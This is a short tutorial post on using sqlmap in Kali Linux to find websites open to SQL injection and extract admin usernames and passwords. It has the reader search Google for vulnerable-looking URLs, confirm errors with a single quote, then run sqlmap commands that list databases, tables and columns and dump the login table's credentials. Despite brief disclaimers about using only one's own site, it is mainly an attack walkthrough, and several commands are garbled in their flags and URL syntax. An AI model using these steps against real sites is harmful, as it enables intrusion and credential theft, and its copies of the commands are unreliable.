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Kali Linux How To Use SQLmap for SQL Injection – Find Website Admin Password
01/02/2014
How to test if a website is vulnerable to SQL injection. To be legal, use your own website. Step 1 – Google for php?=id1
Google for php?=id1
add a Single quote… to the end of the URL. so it reads php?=id1′ If you get an error the website is vulnerable. Go to step 2. If this is your own website – shut it down immediately. You need to secure it before you bring it back online.
Step 2 – Kali SQLMAP – get website databases SQLMAP – u http:\\website.com/page.php?id=1 –dbs This will fetch all available databases on the website. Did you see them listed?
Step 3 – Find the LOGIN table SQLMAP – u http:\\website.com/page.php?id=1 –D www – tables
Did you see all the TABLES on the website list out?
Look for likely targets… eg Login, username or password table.
If you’re not on your own website, or a best friends website (who’s sat next to you), you are into illegal terrority. STOP now!!
Step 4 – Get all the Login Data (from Step 3) SQLMAP – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns
This should display columns with items such as Cookie, ID, IP, Password, Username.
Step 5 – Get Usernames (& Admin) SQLMAP – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump Look for “admin”
Step 6 – Get Passwords (of Admin) SQLMAP – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump
That’s it.